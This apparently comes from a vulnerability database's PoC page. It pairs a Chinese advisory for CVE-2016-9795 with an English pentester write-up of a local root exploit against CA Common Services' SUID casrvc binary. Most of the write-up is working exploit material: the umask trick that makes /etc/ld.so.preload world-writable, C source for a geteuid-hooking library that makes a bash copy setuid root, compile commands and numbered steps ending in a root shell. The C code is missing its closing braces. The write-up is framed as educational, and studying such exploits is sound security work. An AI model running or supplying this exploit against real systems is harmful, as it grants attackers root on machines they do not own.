POC详情: baff7f97849573ea70d09ddf12d7cfeed1622d47

标题: 多款CA产品CA Common Services安全漏洞 (CVE-2016-9795)
描述:CA Client Automation等都是美国CA公司的产品。CA Client Automation是一套自动化和远程客户端管理工具。CA Network and Systems Management是一套企业管理系统。CA Common Services是其中的一个在Unix/Linux平台上绑定的通用服务。 基于AIX、HP-UX、Linux和Solaris平台的多款CA产品中使用的CA Common Services存在安全漏洞。本地攻击者可利用该漏洞更改任意文件,获取root权限。以下产品和
Revisited CVE-2016-9795 privilege escalation (casrvc binary from CA Common Services suite)
# CA Common Services privilege escalation (CVE-2016-9795) revisited

## Description

In one of my pentests, I stumbled across the **casrvc** SUID binary (which is part of CA Common Services suite). As I found out, the binary is vulnerable to local privilege escalation. As a matter of fact, a public CVE (CVE-2016-9795) was already attributed to this vulnerability by NCC group. 

The vulnerability is really trivial and as I later found out, NCC group disclosed a Proof-Of-Concept in their PDF advisory (https://www.nccgroup.com/globalassets/our-research/uk/technical-advisories/2017/advisory-craigsblackie-cve-2016-9795.pdf). Nevertheless, during my pentest engagement, I chose a different exploitation path which for starters is a viable alternative and is possibly less risky if performed correctly. 

## Vulnerability

The vulnerability lies in the **casrvc** SUID binary which exposes a feature that allows the user to choose the filename (and absolute path) to which logs will be written. Part of this log file is controlled by user so in the end this gives the unprivileged user a more or less controlled arbitrary write.

#### Arbitrary output file write
`/opt/CA/SharedComponents/csutils/bin/casrvc -q -f /tmp/t/log_test stop "**[USER CONTROLLED INPUT]**"`

#### Log output

2020-09-20 17:41:08 <22288:00002> [3]: Running in Very Verbose Mode.
2020-09-20 17:41:09 <22288:00003> [3]: INFO - Validating User ithc.oss
2016-08-08 17:41:09 <22288:00004> [0]: ERROR - User does not have permission to
start/stop **[USER CONTROLLED INPUT]**

The already existing PoC simply concatenates the log output to the */etc/passwd* file in order to add another user entry in the root group. Concatenating stuff to */etc/passwd* can sometimes be risky business and in my case I wanted to avoid crashing the server at all cost.

## Exploitation

The exploitation technique is not new and was covered by many other researchers (including [@dawid_golunski](https://www.exploit-db.com/exploits/40768), [@itm4n](https://itm4n.github.io/ca-dollaru-uxdqmsrv-privesc/)). It applies to this binary and I talk about it here for educational purposes.

### Concept
It consists of appending to or creating the **/etc/ld.so.preload** file. This file as described in the Linux manual `man ld.so` allows to define a list of libraries names (one per line) that will be loaded everytime a binary is launched.

              File containing a whitespace-separated list of ELF shared objects to be  loaded  before
              the  program.   See  the  discussion  of  LD_PRELOAD  above.   If  both  LD_PRELOAD and
              /etc/ld.so.preload are employed, the libraries specified by  LD_PRELOAD  are  preloaded
              first.  /etc/ld.so.preload has a system-wide effect, causing the specified libraries to
              be preloaded for all programs that are executed on the system.  (This is usually  unde‐
              sirable,  and is typically employed only as an emergency remedy, for example, as a tem‐
              porary workaround to a library misconfiguration issue.)

The specificity of this file is that the preloaded libraries are loaded for **EVERY** program executed on the system, including SUID programs. This is of course not the case for the "LD_PRELOAD" environment variable that can be set by any user to preload libraries in the context of their session.

### Exploit

#### Arbitrary write

In order to fully control the content of the created file, we use the `umask` command to set the file mode creation mask. That way when the log file is created it will have read and write permissions for everyone.

umask 111
/opt/CA/SharedComponents/csutils/bin/casrvc -q -f /etc/ld.so.preload
echo '' > /etc/ld.so.preload
ls -lah /etc/ld.so.preload
-rw-rw-rw- 1 root dsm 1 Nov  4 15:44 /etc/ld.so.preload

##### Note
We try to erase the content of the file pretty quickly since after executing the **casrvc** executable the content does not contain any valid .so libraries and it will generate error messages everytime a program is started on the computer.

##### Note on umask

In our case, the trick with `umask` works. Sometimes though, executables set the `umask` value theirselves in which case our value of `umask` is overwritten and ignored.

##### Creation of the .so library file

Next we create a .so file. Following is the source code for this .so file. It does three things 
- overwrites the *geteuid* system function 
- which will simply add SUID bit to the binary at location our desired location (in this case "/tmp/root_shell") 
- then it will remove the ld.so.preload file and proceed to normal execution of the original *geteuid* function
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <fcntl.h>

uid_t geteuid(void) {
  static uid_t  (*old_geteuid)();
  old_geteuid = dlsym(RTLD_NEXT, "geteuid");
  if ( old_geteuid() == 0 ) {
    chown("/tmp/root_shell", 0, 0);
    chmod("/tmp/root_shell", 06777);
  return old_geteuid();

To compile it we simply

gcc -Wall -fPIC -shared -o "/tmp/lib.so" "/tmp/lib.c" -ldl

##### Note
In the previous commands we presume that the */tmp* partition is not mounted with NOEXEC nor NOSUID properties.

### Putting it all together
1. We copy the */bin/bash* binary to our desired location
cp /bin/bash /tmp/root_shell

2. We run the **casrvc** binary as described above in order to get write rights to the */etc/ld.so/preload*
umask 111
/opt/CA/SharedComponents/csutils/bin/casrvc -q -f /etc/ld.so.preload
echo '' > /etc/ld.so.preload

3. We copy the path of the compiled lib.so to the */etc/ld.so.preload* file (we already have write permissions to it now)
echo /tmp/lib.so > /etc/ld.so.preload

4. We run wathever SUID program that will call the geteuid function (whatever SUID own by root should be fine, for example "sudo")

5. Enjoy the root shell
$ id
uid=0(root) gid=0(root) groups=0(root)

## References
- [Nginx (Debian Based Distros + Gentoo) - 'logrotate' Local Privilege Escalation](https://www.exploit-db.com/exploits/40768)
- [CVE-2019-19544 - CA Dollar Universe 5.3.3 'uxdqmsrv' - Privilege Escalation via a Vulnerable SUID Binary](https://itm4n.github.io/ca-dollaru-uxdqmsrv-privesc/)


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